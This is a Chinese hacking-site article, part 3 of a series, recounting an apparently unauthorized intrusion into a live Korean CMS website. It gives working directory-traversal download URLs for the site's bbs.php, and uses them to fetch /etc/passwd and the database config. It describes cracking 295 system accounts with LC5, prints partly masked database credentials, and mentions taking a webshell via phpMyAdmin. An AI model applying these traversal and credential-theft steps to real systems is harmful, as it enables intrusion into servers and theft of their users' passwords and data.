欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

对韩国某CMS的一次安全检测(3)

来源:本站转载 作者:佚名 时间:2011-07-29 TAG: 我要投稿

 8.获取系统用户名

使用Editpuls编辑器打开下载的passwd文件,如图13所示,可以查看该服务器上的全部的用户以及密码信息。

 
图13 passwd文件内容


说明:

通过查看图片的属性可以,图片在网站的目录为/ez/bbs/table/pic2/upload/,结前面暴出的网站绝对路径,可知道图片在服务 器中的绝对路径为/home/b****k.net/public_html/ez/bbs/table/pic2/upload/,所以需要8个“.. /”才能返回根目录。

/etc/passwd 文件是linux系统的主要文件之一。该文件中包含了所有用户登录名清单;为所有用户指定了主目录;在登录时使用的 shell 程序名称等。该文件还保存了用户口令;给每个用户提供系统识别号。

到这里,就可以通过phpmyadmin拿webshell了,但我还是想继续检测程序漏洞。

9.破解系统密码

使用LC5导入Unix shadow file文件,即刚才下载的passwd文件,导入后可以看到系统共有295个账号。如图14所示,可以进行破解。

 
图14破解Linux系统帐号

10.继续检测web程序漏洞

继续通过下载漏洞获取其它文件,在浏览器中输入构造好的地址:

http://www.b****k.net/ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file=../../../../ez/bbs.php来下载bbs.php文件,将bbs.php文件下载到本地后,通过查看源代码,得到连接数据库的文件为conf/db_info.php,于是构造数据库文件下载地址:

http://www.b****k.net/ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file=../../../../conf/db_info.php下载数据库连接文件,得到连接数据库的用户名和密码:111111111111111111111

$DB[kind] = "mysql";
$DB[host] = "localhost";
$DB[name] = "b*******";
$DB[user] = "banseuk";
$DB[pass] = "se********";
?>

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载